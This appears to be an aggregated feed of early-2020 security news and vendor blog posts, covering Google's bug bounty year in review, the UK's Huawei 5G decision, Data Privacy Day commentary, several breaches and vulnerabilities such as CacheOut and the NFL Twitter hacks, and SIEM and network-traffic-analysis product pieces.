Vulnerability Reward Program: 2019 Year in Review

Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.

2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we’ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That’s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!
Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out $15 million in rewards. As we have done in years past, we are sharing our 2019 Year in Review across these programs.
What’s changed in the past year?

  • Chrome’s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their program rules page.
  • Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we’re adding in a 50% bonus, making the top prize $1.5 million. See our program rules page for more details around our new exploit categories and rewards.
  • Abuse VRP engaged in outreach and education to increase researchers awareness about the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and US.
  • The Google Play Security Reward Program expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.
  • The Developer Data Protection Reward Program was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.
We also had the goal of increasing engagement with our security researchers over the last year at events such as BountyCon in Singapore and ESCAL8 in London. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.

A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations.

Follow us on @GoogleVRP

Huawei set for limited UK 5G role, but can we Trust Huawei?

Today the UK Government decided Huawei can be allowed to help build the UK's 5G network, but remain banned from supplying kit to "sensitive parts" of the core network. The Prime Minister Boris Johnson made long await decision to ends months of concern for the Chinese telecoms giant. 

The PM had briefed US President Donald Trump about the decision. Trump has been very vocal on his stance exclaiming, “we are not going to do business with Huawei”, and recently Trump’s administration is reportedly nearing publication of a rule that could further block shipments of US-made goods to Huawei. Trump administrator has said it 'is disappointed' with UK government decision. China had warned the UK there could be "substantial" repercussions to other trade and investment plans had the company been banned outright.

There was ferocious debate in the UK parliament post the government announcement, with MPs calling into question the cybersecurity risks which could prevail – the US says the cybersecurity risks are severe, the UK’s security services say they can be managed, whereas Australia has opted for an outright ban. There’s a clear disconnect and the decision today could cause turmoil to the US/UK working relationship that could ultimately impact a post-Brexit trade deal.

Can Huawei be trusted or will using its equipment leave communication networks, and our own mobile phones, vulnerable? The US says Huawei is a security risk, given the firm is heavily state supported and is run by Mr Ren who served in the Chinese military. Huawei 5G equipment could be used for spying and negatively impacting critical national infrastructure. 

The National Cyber Security Centre (NCSC) published a document which says UK networks will have three years to comply with the caps on the use of Huawei's equipment.

"Huawei is reassured by the UK government's confirmation that we can continue working with our customers to keep the 5G rollout on track. It gives the UK access to world-leading technology and ensures a competitive market." the firm's UK chief Victor Zhang said in a statement.

UK security professionals have reported significant concerns around how digital transformation projects and the implementation of 5G will affect their risk posture. 89% of UK businesses said they have concerns around the implementation of emerging technologies and essential digital transformation projects and almost four in ten (38%) expect digital transformation and 5G to offer cybercriminals more effective and more destructive methods of achieving their nefarious goals, according to research from VMWare Carbon Black.

A10 Networks' VP of Strategy, Gunter Reiss said “The global dispute over whether tech giant Huawei should be used in national 5G networks has created a lot of geopolitical conversations around the 5G build-out, security to Critical National Infrastructure, and generally whether certain vendors should be included or excluded. However, operators need to base their decisions not on these opinions but on technology – the strength, innovation and security capabilities. With the massive increases in bandwidth, number of devices predicted to be on these networks and the growing security requirements, the technology being used must meet these needs.

A Security Compromise on Economical Grounds
"This is a good compromise between alleviating 'security' concerns and making sure that the 5G UK market is not harmed," commented Dimitris Mavrakis, a telecoms analyst at ABI Research. Previously I posted about National Security Vs Economic argument which has been behind the UK government decision - see The UK Government Huawei Dilemma and the Brexit Factor 

5 identity priorities for 2020

Today, Joy Chick, Corporate Vice President of Identity, shared five priorities central to security that organizations should prioritize in 2020 as they digitally transform. These priorities are based on many conversations with our customers, including:

  1. Connect all applications and cloud resources to improve access controls and the user experience.
  2. Empower developers to integrate identity into their apps and improve security.
  3. Go passwordless to make security effortless for users.
  4. Enable boundary-less collaboration and automated access lifecycle for all users.
  5. Start your Zero Trust journey to protect your organization as you digitally transform.

To learn more about these priorities, and how decentralized identity is poised to offer greater verifiability and privacy, read Joy’s post, 5 identity priorities for 2020—preparing for what’s next.

Also bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 5 identity priorities for 2020 appeared first on Microsoft Security.

Data privacy is about more than compliance—it’s about being a good world citizen

Happy Data Privacy Day! Begun in 2007 in the European Union (E.U.) and adopted by the U.S. in 2008, Data Privacy Day is an international effort to encourage better protection of data and respect for privacy. It’s a timely topic given the recent enactment of the California Consumer Privacy Act (CCPA). Citizens and governments have grown concerned about the amount of information that organizations collect, what they are doing with the data, and ever-increasing security breaches. And frankly, they’re right. It’s time to improve how organizations manage data and protect privacy.

Let’s look at some concrete steps you can take to begin that process in your organization. But first, a little context.

The data privacy landscape

Since Data Privacy Day commenced in 2007, the amount of data we collect has increased exponentially. In fact we generate “2.5 quintillion bytes of data per day!” Unfortunately, we’ve also seen a comparable increase in security incidents. There were 5,183 breaches reported in the first nine months of 2019, exposing a total of 7.9 billion records. According to the RiskBased Data Breach QuickView Report 2019 Q3, “Compared to the 2018 Q3 report, the total number of breaches was up 33.3 percent and the total number of records exposed more than doubled, up 112 percent.”

In response to these numbers, governments across the globe have passed or are debating privacy regulations. A few of the key milestones:

  • Between 1998 and 2000, The E.U. and the U.S. negotiated Safe Harbor, which were privacy principles that governed how to protect data that is transferred across the Atlantic.
  • In 2015, the European Court of Justice overturned Safe Harbor.
  • In 2016, Privacy Shield replaced Safe Harbor and was approved by the courts.
  • In 2018, the General Data Protection Regulation (GDPR) took effect in the E.U.
  • On January 1, 2020, CCPA took effect for businesses that operate in California.

Last year, GDPR levied 27 fines for a total of € 428,545,407 (over $472 million USD). California will also levy fines for violations of CCPA. Compliance is clearly important if your business resides in a region or employs persons in regions protected by privacy regulation. But protecting privacy is also the right thing to do. Companies who stand on the side of protecting the consumer’s data can differentiate themselves and earn customer loyalty.

Don’t build a data privacy program, build a data privacy culture

Before you get started, recognize that improving how your organization manages personal data, means building a culture that respects privacy. Break down siloes and engage people across the company. Legal, Marketing, SecOps, IT, Senior Managers, Human Resources, and others all play a part in protecting data.

Embrace the concept that privacy is a fundamental human rightPrivacy is recognized as a human right in the U.N. Declaration of Human Rights and the International Covenant on Civil and Political Rights, among other treaties. It’s also built into the constitutions and governing documents of many countries. As you prepare your organization to comply with new privacy regulations, let this truth guide your program.

Understand the data you collect, where it is stored, how it is used, and how it is protected—This is vital if you’re affected by CCPA or GDPR, which require that you disclose to users what data you are collecting and how you are using it. You’re also required to provide data or remove it upon customer request. And I’m not just talking about the data that customers submit through a form. If you’re using a tool to track and collect online user behavior that also counts.

This process may uncover unused data. If so, revise your data collection policies to improve the quality of your data.

Determine which regulations apply to your business—Companies within the E.U. that do business with customers within the E.U., or employ E.U. citizens, are subject to GDPR. CPPA applies to companies doing business within California and meet one of the following requirements:

  • A gross annual revenue of more than $25 million.
  • Derive more than 50 percent of their annual income from the sale of California consumer personal information or
  • Buy, sell, or share the personal information of more than 50,000 California consumers annually.

Beyond California and the E.U., India is debating a privacy law, and Brazil’s regulations, Lei Geral de Proteção de Dados (LGPD), will go into effect in August 2020. There are also several privacy laws in Asia that may be relevant.

Hire, train, and connect people across your organization—To comply with privacy regulations, you’ll need processes and people in place to address these two requirements:

  1. Californians and E.U. citizens are guaranteed the right to know what personal information is being collected about them; to know whether their personal information is sold or disclosed and to whom; and to access their personal information.
  2. Organizations will be held accountable to respond to consumers’ personal information access requests within a finite timeframe, for both regulations.

The GDPR requires that all companies hire a Data Protection Officer to ensure compliance with the law. But to create an organization that respects privacy, go beyond compliance. New projects and initiatives should be designed with privacy in mind from the ground up. Marketing will need to include privacy in campaigns, SecOps and IT will need to ensure proper security is in place to protect data that is collected. Build a cross-discipline team with privacy responsibilities, and institute regular training, so that your employees understand how important it is.

Be transparent about your data collection policies—Data regulations require that you make clear your data collection policies and provide users a way to opt out (CCPA) or opt in (GDPR). Your privacy page should let users know why the data collection benefits them, how you will use their data, and to whom you sell it. If they sell personal information, California businesses will need to include a “Do not sell my personal information” call to action on the homepage.

A transparent privacy policy creates an opportunity for you to build trust with your customers. Prove that you support privacy as a human right and communicate your objectives in a clear and understandable way. Done well, this approach can differentiate you from your competitors.

Extend security risk management practices to your supply chain—Both the CCPA and the GDPR require that organizations put practices in place to protect customer data from malicious actors. You also must report breaches in a timely manner. If you’re found in noncompliance, large fees can be levied.

As you implement tools and processes to protect your data, recognize that your supply chain also poses a risk. Hackers attack software updates, software frameworks, libraries, and firmware as a means of infiltrating otherwise vigilant organizations. As you strengthen your security posture to better protect customer data, be sure to understand your entire hardware and software supply chain. Refer to the National Institute of Standards and Technology for best practices. Microsoft guidelines for reducing your risk from open source may also be helpful.

Microsoft can help

Microsoft offers several tools and services to help you comply with regional and country level data privacy regulations, including CCPA and GDPR. Bookmark the Security blog and the Compliance and security series to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity and connect with me on LinkedIn.

The post Data privacy is about more than compliance—it’s about being a good world citizen appeared first on Microsoft Security.

UK Medical Products Manufacturer Shuts Plant Following Breach

UK Medical Products Manufacturer Shuts Plant Following Breach

A British company that specializes in making skin, bone, and organ grafts has temporarily closed its manufacturing plant in America following a cybersecurity breach.

Regenerative medical technology company Tissue Regenix Group PLC said on Tuesday that its computer systems and a third-party IT service provider in the United States were accessed without authorization. No details were given regarding how the incident occurred or when the company became aware that it had been compromised.

Tissue Regenix responded to the cybersecurity incident by taking the affected system offline and shutting down operations at its plant in Texas. The company has appointed forensic cybersecurity specialists to investigate how and when the breach occurred and said that it is in talks with the relevant legal authorities. 

The cybersecurity incident is not believed to have affected any of Tissue Regenix's operations in the UK and is not thought to have impacted the company's financial systems. 

"Tissue Regenix has taken precautionary steps, including taking affected systems offline. This has restricted access to certain business operations, including the company's ability in the short-term to continue manufacturing in its United States facility, which has been taken offline whilst the incident is being investigated," said a Tissue Regenix spokesperson. 

"The company is engaged with its third-party IT service provider, the relevant legal authorities and cyber security experts to rectify the incident as quickly as possible and to minimize any impact on its operations. The time required to resolve the incident is currently unknown."

According to Reuters, news of the breach caused the share price of Tissue Regenix to tumble by as much as 22%. 

Tissue Regenix was formed in 2006 as an offshoot of the University of Leeds. The company is based in the historical city of York. Tissue Regenix set up its base in America in the tail end of 2012. 

The medical technology product that Tissue Regenix is known for producing is a special kind of tissue that can be used to repair worn-out or diseased human body parts. The tissue has been designed in such a way that the patient's body is unlikely to reject a graft. 

The cyber-attack has come at a particularly bad time for Tissue Regenix, which said last Wednesday that its funding is not guaranteed beyond April.

New ‘CacheOut’ Attack Leaks Data from Intel CPUs, VMs and SGX Enclave

Another month, another speculative execution vulnerability found in Intel processors. If your computer is running any modern Intel CPU built before October 2018, it's likely vulnerable to a newly discovered hardware issue that could allow attackers to leak sensitive data from the OS kernel, co-resident virtual machines, and even from Intel's secured SGX enclave. Dubbed CacheOut a.k.a. L1 Data

NFL Twitter Accounts Hacked One Week Before Super Bowl

NFL Twitter Accounts Hacked One Week Before Super Bowl

The Twitter accounts of America's National Football League (NFL) and 15 of its teams have been hacked just one week before the biggest football game of the 2019–2020 season.

The first team to be compromised was the Chicago Bears, whose account @ChicagoBears was hacked at 8:40 a.m. on Sunday morning. 

Followers were shown an image of a man with a full, dark beard who was wearing the traditional Arabic head gear of a keffiyeh and an agal together. Along with the photo, hackers posted the caption: "Welcome to our new owner @Turki_alalshikh #ProBowl #Bears100 #ChicagoBears."

A Saudi "white hat" hacker group known as OurMine was quick to claim responsibility for the hacks, which the group said were carried out as a publicity stunt to "announce that we are back" and to "show people that everything is hackable."

Fans of rival American football team the Detroit Lions seized the opportunity afforded by the Bears hack to propose a trade. The account @PrideofDetroit tweeted at the Bears: "Hey, while you're still hacked @ChicagoBears, trade us Khalil Mack for a 6th rounder. Twitter is a binding contract."

The hackers decided to run with the joke and responded with "Done for 1$."

By 12:43 p.m. on Sunday, the Chicago Bears were back in control of their Twitter account and had posted a message apologizing to fans for the compromise. 

OurMine allegedly compromised the official Twitter account of the NFL on Monday. In a statement released yesterday, the NFL said: "On Monday, the NFL Cybersecurity department became aware of a breach of league-related social media accounts. Targeted breaches and additional failed attempts were discovered across the league and team accounts.

"The NFL took immediate action and directed the teams to secure their social media accounts and prevent further unauthorized access."

NFL reporter Dov Kleiman began a Twitter thread of screenshots depicting all the NFL team accounts compromised in the OurMine hack. By his reckoning, a total of 15 teams were hacked, including the Green Bay Packers

Other teams to be hacked were the Kansas City Chiefs and the San Francisco 49ers, who are due to compete on February 2 in the Super Bowl LIV game, which will decide the champion for the NFL's 2019–2020 (and 100th) season.

An anonymous individual who responded to questions from NBC News via an email account linked with OurMine would not reveal how the group carried out the hack. The individual did, however, reveal their pick for Sunday's big game, predicting a victory for the Chiefs.

It’s Data Privacy Day. Do You Know What Info Your Apps Are Tracking?

January 28 is Data Privacy Day—not exactly a major holiday, but it does provide an important opportunity to address something that’s compromising your privacy on a daily basis: namely, your phone.

With a nod to all the flip-phone activists out there, it’s fair to say smartphones aren’t going anywhere. Few among us pine for the days when wall-anchored phones that couldn’t send photos, call a cab, and watch a clip of Baby Yoda at the same time. The level of convenience ushered in by Android and iOS devices is beyond dispute. 

That convenience came at a heavy cost that consumers are only now beginning to appreciate.  Take, for instance, the “Brightest Flashlight” app, which ran afoul of the FTC a few years back on account of transmitting intimate levels of user data to advertisers while providing a minimal level of service; i.e. turning on the light of an Android device. 

And that’s the most basic example. Mobile apps provide the opportunity to track our day-to-day lives down to the most intimate details, and they often share that data with little to no oversight: dating apps such as and Tinder have been “caught” collecting and selling data relating to drug use and religious views. Period tracking apps like Maya have been found to upload user data to Facebook including heaviness of menstrual flow, body weight, and sexual activity. Google recently acquired the fitness smartwatch brand FitBit, and with it the access to the sleep, exercise, and eating habits of its users. We might be at a loss as to how this data can be monetized, but rest assured: your data has value and is actively being exploited one app at a time.

What’s the solution? Unfortunately, there isn’t one, at least not yet. Despite the passage of California’s privacy law, we’re still very much living in the Wild West when it comes to user data.

Still, we can mitigate the ongoing privacy catastrophe that is the modern internet by making a quick audit of the apps on our smartphones. Take a look at what you have installed and ask yourself the following questions:


  • Does this service actually require an app? If you have access to the same services by connecting via a web browser that you can with an app, stick to the web, preferably via a VPN and in private browsing mode. Most mobile apps are configured to get more user data than would be accessible via a website
  • Is the data being accessed by this app worth it? A flashlight app shouldn’t need your physical location. Facebook Messenger shouldn’t need to track the velocity at which you’re traveling. That Scrabble clone doesn’t need to know every contact on your phone. Be circumspect about the kind of access being granted when you install an app on your phone. If there’s any doubt, don’t install it.
  • Do I want this information out in the world? Any information shared with an app has the potential to be uploaded, processed and analyzed by any number of third parties. Don’t share anything with an app that you wouldn’t be comfortable having a stranger know about you. 


It’s overly optimistic to expect to reclaim your privacy on Data Privacy Day, but you can at least take a few steps in the right direction. Delete any apps you’re not using, and see if there are more privacy-friendly alternatives to some of your more frequently used apps.


The post It’s Data Privacy Day. Do You Know What Info Your Apps Are Tracking? appeared first on Adam Levin.

Data Privacy Day warning: Organizations that succeed take privacy seriously

Businesses should be worried that Canadians increasingly don’t trust them to handle their personal data and information generated through online buying, according to a senior federal privacy official.

In an interview to mark the 14th annual International Data Privacy Day, deputy privacy commissioner Gregory Smolynec noted that surveys show 90 per cent of Canadian respondents say they are very concerned about their inability to protect their privacy.

“Very high numbers of Canadians believe businesses do not respect their privacy right,” he added. “This should raise concerns.”

The few countries that began observing January 28 as Data Privacy Day to raise awareness of businesses, governments and consumers about data protection best practices have grown to 50. Yet judging by the regular reports of data breaches there hasn’t been much progress.

In November the Office of the Privacy Commissioner estimated the personal information of 28 million Canadians had been exposed in the first 12 months of mandatory federal data breach reporting.

In his annual report issued a month later, Privacy Commissioner Daniel Therrien repeated his plea for Ottawa to recognize privacy as a fundamental right in law.

The current law (the Personal Information Protection and Electronic Documents Act, also known as PIPEDA) and the Liberal government’s seeming unwillingness to consider giving his office much stronger enforcement power,  “create an excellent incentive for companies not to take privacy seriously, change their practices only if forced to after years of litigation, and generally proceed without much concern for compliance with privacy laws,” said Therrien.

A recent Novipro-Leger survey of 496 IT and other officials from Canadian companies released this week found that not quite half the companies (48 per cent) had reviewed their data practices in 2019. Fewer than half of respondents believed their organizations were very well protected against data loss (46 per cent), data breaches (44 per cent), and viruses (45 per cent).

“Canadian businesses have been slow to tighten up their practices and are struggling to respond to the growing threat,” concluded the report. (Registration required)

On the other side, a recent survey released by data management provider Tealium showed half of U.S. consumer respondents don’t feel well informed about how businesses are using their data.


Organizations don’t have to sacrifice privacy for security

Asked if businesses don’t take privacy seriously, Smolynec noted new communications technologies are having an impact on privacy and expose businesses to vulnerabilities.

“There are some businesses that are not compliant (with PIPEDA), there are other businesses that have to develop robust privacy programs and cybersecurity measures to protect themselves.”

To show Canadians they are tough about privacy businesses need to make sure they follow PIPEDA and get “meaningful consent” to the personally identifiable data they collect, he said. That includes explaining what personal information is being collected, the purpose of the collection, who it is being shared with, how it may be used and any potential risks. The OPC website has advice for businesses on consent here.

The OPC today also issued a package the public can use to spark discussion about privacy.

“It’s very critical for businesses to pay close attention to their processes related to [data] security and they have to make sure they have invested and structured themselves to address the risks of breaches,” said Smolynec. “That will help improve trust.”

Research firm Gartner also believes organizations need to pay more attention to the link between privacy and trust. Privacy is becoming a reason for consumers to purchase a product, in the same way that “organic,” “free trade” and “cruelty-free” labels have driven product sales, it said in a note earlier this month.

“Privacy-first products are likely to follow this trend,” said Bart Willemsen, a Gartner vice-president. “To increase customer trust, executive leaders need to build a holistic and adaptive privacy program across the organization, and be proactive instead of responding to each jurisdictional challenge.”


Supreme Court of Canada ruling on privacy

More than 60 jurisdictions around the world have enacted or proposed postmodern privacy and data protection laws, following the introduction of the EU’s General Data Protection Regulation (GDPR) in 2018.

“People are actively demanding privacy protection — and legislators are reacting,” said Willemsen. “If your organization operates globally, focus on standardizing operations in accordance with the GDPR, and then adjust as required for local requirements.”

He suggests using technology solutions that automate portions of a privacy management program. He also urged organizations to appoint a data privacy officer who reports to the board.

Dave Masson, Ottawa-based director of enterprise cybersecurity for Darktrace, said in an interview that Data Privacy Day should mean to an organization that — if it isn’t already doing so — it has to start protecting the personally identifiable information of customer and employees. The consequences of data theft could be “disastrous,” he said, including lawsuits and severe damage to the organization’s reputation.

“Organizations still struggle with visibility of what they have on their network,” he said, emphasizing the complexities introduced by cloud architectures. “That’s one of the problems — they can’t see what they’ve got.

“If I was an organization and confident in my security approach, I would be very proud to point out [on Data Privacy Day]  out what’s in place … as a way of assuring people you’re taking this seriously.”


Privacy Commissioners slam B.C. firm in Facebook scandal

Organizations need to take “trust-worthiness” more seriously, Eve Maler, interim CTO of digital identify provider ForgeRock, said in an interview.

Data regulations have been around for years, she argued, but they have focused on basic data protection. Newer regulations demand data transparency — telling consumers what the firm knows about them — and allowing customers more control over their data. So successful organizations need to go beyond compliance to establish trust.

Organizations have to think more carefully about the privacy implications of their products, she said. For example, one company has had to withdraw what it hoped was a promising child bedroom monitor after complaints it wasn’t secure.

“That’s an awfully expensive way to go to market,” Maler said.

To impress customers, firms should also look at the personal data they collect as a joint asset, she added.

In the run-up to Data Privacy Day, a number of firms in the security space released statements warning of the need to act.

“We currently see many companies paying catch-up with new regulations, working to implement the right security tools and practices after a breach,” said Darrell Long, vice-president of product management at One Identity. “Hopefully, Data Privacy Day becomes a good initiative to remind companies to think ahead and maintain a proactive stance on privacy before a cyber incident occurs.”

Data Privacy Day “is all about raising awareness of how organizations put the vast amount of sensitive data they store at risk and encouraging everyone to take action to better protect this data,” said Ray Overby, CTO and co-founder of Key Resources.

One major risk to data privacy is excessive access, which simply means that there are individuals, either internally or externally, who have unnecessary access to corporate information.

“The more people with access to information, the more likely your data will be compromised,” he said. “These issues can crop up inadvertently and go undetected for years, so organizations need to include excessive access checking in ongoing security processes.”

Another tip for organizations to improve data privacy practices, he said, is to accurately inventory, classify, and define data ownership.

Companies have to remember that consumers entrust them with their personal data, said Anis Uzzaman, CEO and General Partner of Pegasus Tech Ventures.

“On Data Privacy Day, it’s important to remember that sensitive information needs safeguarding more than ever before,” indicated Uzzaman. “Some information that particularly needs to be protected by companies includes personal health data as this is very sensitive information that most people don’t want to be shared or used against them for future decisions they may want to make.”

When companies make the move to new application systems, it is essential to ensure a smooth transition by implementing best practices such as conducting a thorough inventory to determine no personal data is being collected, adequately backing it up, and properly protecting it with appropriate security platforms, said  Steele Arbeeny, CTO of SNP Group.

This will be the first year Data Privacy Day will be celebrated with the new tough California Consumer Privacy Act (CCPA), which came into effect at the beginning of January.

Why is Multi Tenancy Important in a SIEM Solution?


All SIEMs are well known for their ability to monitor IT infrastructures for potential threats, escalating them to the appropriate party. Though these solutions share this core function in common, SIEMs differ widely in terms of features. It’s important to evaluate your own environment to determine what your priorities are. For certain organizations, particularly MSPs, multi tenancy is a key functionality.

What is Multi Tenancy?

In its original architectural context, multi tenancy establishes the difference between an apartment building and a single residence home. When used in technology, it describes a single instance of hardware or software that has more than one resident. Multi tenancy is perhaps most commonly recognized in conjunction with cloud computing, in which multiple users or groups reside on a single cloud server. It is also regularly seen in Software as a Service (SaaS) applications.

Certain SIEM solutions also have this capability. Clear partitions are in place to allow each tenant the ability to use it for their own environment. Each instance can be tailored specifically to meet the requirements and needs for any given infrastructure. Data remains strictly siloed to ensure both privacy and security. For instance, a Security Operations Center (SOC) that oversees multiple agencies would create a different tenant for each agency.

Multi Tenancy SIEMs, MSPs, and MSSPs

Multi Tenancy SIEM solutions are particularly helpful for Managed Service providers (MSPs) and Managed Security Service Providers (MSSPs). Managed Service Providers are companies that run IT services for different organizations. MSSPs specialize in running security services. Both of these business models include or have the option of different cybersecurity offerings, like threat monitoring with a SIEM solution. Having to purchase and run a single instance SIEM for each customer is not only an expensive undertaking, it would also take more time to keep up with the basic administration of so many individual solutions. The ability of a solution to offer multi tenancy is not only cost efficient, it ensures that customer accounts are segregated, but are still easily managed through one centralized solution.

Multi Tenancy and Event Manager

Event Manager includes multi tenancy capabilities ideal for MSPs and large enterprises looking to add SIEM segmentation to their offerings. It makes rapid threat detection and response attainable for substantial, complex networks with high volumes of security events to manage, and can easily scale as your organization continues to grow. Event Manger’s multi tenancy administration is straightforward and easy to use, but also provides ample flexibility so that you can tailor each instance as needed. With a multi tenancy SIEM in place, you can enable your customers to take threat detection and response to the next level, reducing risk and remaining compliant with regulations and industry best practices.


Big text: 
Resource type: 
Want to learn more about how to put a SIEM to work?

Download our use case guide to get examples of the many different ways our SIEM solution, Event Manager, can bolster your security with real time monitoring, threat prioritization, and more.

Zoom Bug Potentially Allowed Attackers to Find and Join Active Meetings

Remote conferencing services provider Zoom patched a vulnerability that could have allowed an attacker to find and join active meetings. Check Point explained that the issue stemmed from the way in which Zoom secured certain meetings: If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 […]… Read More

The post Zoom Bug Potentially Allowed Attackers to Find and Join Active Meetings appeared first on The State of Security.

CES 2020 Trend: Onboarding AI

CES didn't have an overarching tech, like 3D or huge flat screens, of past years. As I've reflected on what I saw at the show, what emerged is a new trend: a tech inflection point that will define much of the coming decade's challenges and opportunities. That trend is onboarding Artificial Intelligence.

Huawei to get only partial access to UK’s 5G networks

Huawei and other “high risk” telecom providers will be excluded from the core of the U.K.’s 5G and gigabit-capable networks, Prime Minister Boris Johnson’s government has decided.

It’s a move that could influence Canada’s decision on whether to allow carriers here to buy 5G equipment from Huawei. However, that decision is complicated by the tense relations with China over the detention of two Canadians after Huawei’s chief financial officer was arrested on an extradition request by the United States.

Bell and Telus, which use Huawei equipment in their 4G access networks, are waiting for a decision from Ottawa.

A number of national security experts have warned Ottawa that allowing Canadian carriers to buy 5G equipment from Chinese manufacturers would be a security risk in part because of Chinese law that mandates companies there work with its intelligence agencies. Against that Huawei says the Canadian division isn’t subject to Chinese law. At the same time IT security experts say any threat by Chinese telecom gear can be mitigated because governments already have to think about possible hacks of equipment from any manufacturer.

The U.S. and Australia have banned their carriers from buying 5G equipment from Chinese manufacturers.


Huawei moves U.S. research centre to Canada

We welcome scrutiny, says Huawei Canada’s new VP of government affairs

In a decision released this morning, the government defied warnings from the United States that allowing U.K. carriers to buy any 5G equipment from Chinese manufacturers will be a security risk and a decision that could imperil its position in the Five Eyes intelligence-sharing co-operative.

In its statement — which doesn’t specifically mention Huawei — the U.K. government set out restrictions carriers must obey when purchasing equipment from what are deemed high-risk vendors. High-risk vendors are defined as those which pose greater security and resilience risks to U.K. telecoms networks.

High-risk vendors are excluded from sensitive ‘core’ parts of 5G and gigabit-capable networks, including safety-related and safety-critical networks in Critical National Infrastructure. They are also cut out of “sensitive geographic locations, such as nuclear sites and military bases.”

There is also now a 35 per cent cap on high-risk vendor access to the access parts of those networks, meaning pieces like cellular antennas. Legislation enforcing the decision will be introduced soon.

Meanwhile, the U.K. National Cyber Security Centre has issued guidance to carriers to implement the decision.

Huawei UK chief Victor Zhang issued a statement saying “Huawei is reassured by the UK government’s confirmation that we can continue working with our customers to keep the 5G rollout on track. This evidence-based decision will result in a more advanced, more secure and more cost-effective telecoms infrastructure that is fit for the future. It gives the UK access to world-leading technology and ensures a competitive market.”

Canadian telecom consultant Mark Goldberg told that “I hope Canadian officials complete a thorough review of the issues and reach a conclusion based on facts and evidence, free of political interference.”

John Strand, a U.K.-based telcom analyst said in a note that the British decision limits the amount that Huawei can sell in the U.K. It also means that UK operators will have to prioritize network upgrades in the Western part of the country where Huawei equipment is largely deployed.

“Overall, the UK policy will send a strong signal to the rest of Europe and the world that the use of Chinese equipment poses a security risk and should be limited,” Strand wrote. “The UK new policy is a step in the right direction, and it underscores the need for greater scrutiny of technology from firms owned and/or affiliated with the Chinese government.”

Dimitris Mavrakis, research director at tech market advisory firm ABI Research said the U.K. ruling “is extremely good news for Huawei.” The firm is “thrilled” that government took advice from security advisors and didn’t submit to “pressure induced by geopolitical tactics … The decision is a good compromise between alleviating these “security” concerns and making sure that the 5G UK market is not harmed.”

Developing …


Ryuk and Sodinokibi Surge as Ransom Payments Double

More Sophisticated Gangs Increasingly Target Large Enterprises, Coveware Warns
Bad news on the ransomware front: Victims that choose to pay attackers' ransom demands - in return for the promise of a decryption tool - last quarter paid an average of $84,116, according to Coveware. But gangs wielding Ryuk and Sodinokibi - aka REvil - often demanded much more.

Time for Some Straight Talk Around Network Traffic Analysis

According to research from the Enterprise Strategy Group, 87% of organizations use Network Traffic Analysis (NTA) tools for threat detection and response today, and 43% say that NTA is a “first line of defense” in case of an attack. The increasing IT complexity is one of the main factors in the adoption of NTA tools – growing infrastructure, rise in hybrid and multi cloud deployments, employees accessing the network from any device and any location, and large number of smart devices (IoT/OT) connecting to the network. At the same time, the attack landscape has evolved as well – use of stolen credentials, threats hiding in encrypted traffic, rise in nation-state attacks, and more.

Perhaps that’s why there are so many NTA vendors out there today, trying to catch the attention of security practitioners, carrying their “AI and ML” billboards.

Cisco offers an NTA solution as well, but it wasn’t born yesterday. Cisco Stealthwatch has been in the market more than 17 years. And here are some things that make it the market leading NTA solution:

Broad dataset

Stealthwatch has always relied on network meta data such as NetFlow to feed into its analytics. Now, some vendors claim that this way of ingesting telemetry doesn’t give the complete picture and has limitations. It’s because they rely on deploying a large number of sensors and probes in the network to capture data. If I were cynical, I’d say the vendors who take this position want you to buy more probes and increase your workload!

We realized very early on that as the network grows exponentially, it’s very difficult (and expensive) to deploy sensors everywhere. And this approach leaves you with a lot of blind spots. That’s why we offer an agentless deployment to customers using built in functionality in your network devices. And unlike competitive claims, Stealthwatch doesn’t just rely on NetFlow. For example, it gets user contextual data from Cisco Identity Services Engine (ISE) and also ingests proxy, web, and endpoint data to provide comprehensive visibility. If you do need to investigate the payload, Stealthwatch integrates with major packet capture solutions so you can selectively analyze the malicious traffic pinpointed by Stealthwatch.

Layered analytical approach

Visibility is great, but can be dangerous when it begins to overwhelm your security team. The key is effective analytics to reduce that massive dataset to a few actionable alerts. Stealthwatch uses close to 100 different behavioral models to analyze the telemetry and identify anomalies. These anomalies are further reduced to high-level alerts mapped to the kill-chain such as reconnaissance, command-and-control, data exfiltration and others. Stealthwatch also employs machine learning that uses global threat intelligence powered by Cisco Talos and techniques like supervised and unsupervised learning, statistical modeling, rule mining…I could go on. But I want to talk about the outcomes of analytics within the solution:

  • Stealthwatch processes ~6.7 trillion network sessions each day across ~80 million devices in our customer environments and reduces them to a few critical alerts. In fact, our customers consistently rate more than 90% of the alerts they see in the dashboard as helpful.
  • Stealthwatch can automatically detect and classify devices and their roles on the network so that your security scales automatically with your growing network
  • Another key outcome of Stealthwatch security analytics is the ability to analyze encrypted traffic to detect threats and ensure compliance, without any decryption, using Encrypted Traffic Analytics. With greater than 80% of the web traffic being encrypted1 and more than 70% of threats in 2020 predicted to use encryption2, this is a major attack vector and it’s no longer feasible to rely on decryption-based monitoring
